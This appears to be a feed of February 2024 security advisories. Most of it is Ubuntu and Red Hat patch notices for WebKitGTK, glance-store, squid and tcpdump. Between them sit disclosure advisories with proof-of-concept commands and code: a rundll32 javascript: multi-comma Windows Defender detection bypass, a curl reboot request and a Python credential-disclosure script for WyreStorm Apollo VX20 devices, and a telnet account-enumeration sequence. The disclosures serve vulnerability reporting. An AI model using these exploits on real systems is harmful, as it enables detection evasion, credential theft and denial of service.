Ubuntu Security Notice 6631-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6631-1February 12, 2024webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   libjavascriptcoregtk-4.0-18     2.42.5-0ubuntu0.23.10.2   libjavascriptcoregtk-4.1-0      2.42.5-0ubuntu0.23.10.2   libjavascriptcoregtk-6.0-1      2.42.5-0ubuntu0.23.10.2   libwebkit2gtk-4.0-37            2.42.5-0ubuntu0.23.10.2   libwebkit2gtk-4.1-0             2.42.5-0ubuntu0.23.10.2   libwebkitgtk-6.0-4              2.42.5-0ubuntu0.23.10.2Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.42.5-0ubuntu0.22.04.2   libjavascriptcoregtk-4.1-0      2.42.5-0ubuntu0.22.04.2   libjavascriptcoregtk-6.0-1      2.42.5-0ubuntu0.22.04.2   libwebkit2gtk-4.0-37            2.42.5-0ubuntu0.22.04.2   libwebkit2gtk-4.1-0             2.42.5-0ubuntu0.22.04.2   libwebkitgtk-6.0-4              2.42.5-0ubuntu0.22.04.2This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6631-1   CVE-2024-23206, CVE-2024-23213, CVE-2024-23222Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.42.5-0ubuntu0.23.10.2   https://launchpad.net/ubuntu/+source/webkit2gtk/2.42.5-0ubuntu0.22.04.2

Ubuntu Security Notice USN-6631-1

Ubuntu Security Notice 6630-1 - It was discovered that Glance_store incorrectly handled logging when the DEBUG log level is enabled. A local attacker could use this issue to obtain access_key values.

==========================================================================  
Ubuntu Security Notice USN-6630-1  
February 12, 2024

python-glance-store vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Glance_store could be made to expose sensitive information.

Software Description:  
- python-glance-store: OpenStack Image Service store library

Details:

It was discovered that Glance_store incorrectly handled logging when the  
DEBUG log level is enabled. A local attacker could use this issue to obtain  
access_key values.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-glance-store            4.6.1-0ubuntu1.1

Ubuntu 22.04 LTS:  
   python3-glance-store            3.0.0-0ubuntu1.4

Ubuntu 20.04 LTS:  
   python3-glance-store            2.0.0-0ubuntu4.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6630-1  
   CVE-2024-1141

Package Information:  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.6.1-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/3.0.0-0ubuntu1.4  
   https://launchpad.net/ubuntu/+source/python-glance-store/2.0.0-0ubuntu4.3

Ubuntu Security Notice USN-6630-1

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message.Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.[References]https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt[Exploit/POC]Open command prompt as Administrator.C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)Access is denied.C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)Multi-commas, for the Win![Network Access]Local[Severity]High[Disclosure Timeline]February 7, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Windows Defender Detection Mitigation Bypass

An issue was discovered on WyreStorm Apollo VX20 versions prior to 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (DOS)[Affected Product Code Base]APOLLO VX20 < 1.3.58, fixed in v1.3.58[Affected Component]Web interface, reboot and reset commands[CVE Reference]CVE-2024-25736[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.[Exploit/POC]curl -k https://192.168.x.x/device/reboot[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Incorrect Access Control

WyreStorm Apollo VX20 versions prior to 1.3.58 suffer from a cleartext credential disclosure vulnerability when accessing /device/config with an HTTP GET.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (Credentials Disclosure)[Affected Component]Web interface, config[Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58[CVE Reference]CVE-2024-25735[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/configE.g. HTTP response snippet::{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"},"softAp":{"password":"12345678","router":"y","softAp":"y"}...[Exploit/POC]import requeststarget="https://x.x.x.x"res = requests.get(target+"/device/config", verify=False)idx=res.content.find('{"password":')if idx != -1:    idx2=res.content.find('router')    if idx2 != -1:        print("[+] CVE-2024-25735 Credentials Disclosure")        print("[+] " + res.content[idx + 1:idx2 + 11])        print("[+] hyp3rlinx")else:    print("[!] Apollo vX20 Device not vulnerable...")[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Credential Disclosure

An issue was discovered on WyreStorm Apollo VX20 devices prior to version 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts allowing for account discovery.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Account Enumeration[CVE Reference]CVE-2024-25734[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.[Exploit/POC]TELNET x.x.x.x 23username:aausername:bbusername:adminpassword:[Network Access]Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58[Severity]Medium[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Account Enumeration

Red Hat Security Advisory 2024-0773-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0773.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0773-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0773  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (RHEL-18254)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0773-03

Red Hat Security Advisory 2024-0772-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0772.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0772-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0772  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (RHEL-18253)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0772-03

Red Hat Security Advisory 2024-0771-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0771.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0771-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0771  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (RHEL-18255)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0771-03

Red Hat Security Advisory 2024-0769-03 - An update for tcpdump is now available for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0769.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: tcpdump security updateAdvisory ID:        RHSA-2024:0769-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0769Issue date:         2024-02-12Revision:           03CVE Names:          CVE-2021-41043====================================================================Summary: An update for tcpdump is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.Security Fix(es):* tcpslice: use-after-free in extract_slice() (CVE-2021-41043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-41043References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2040392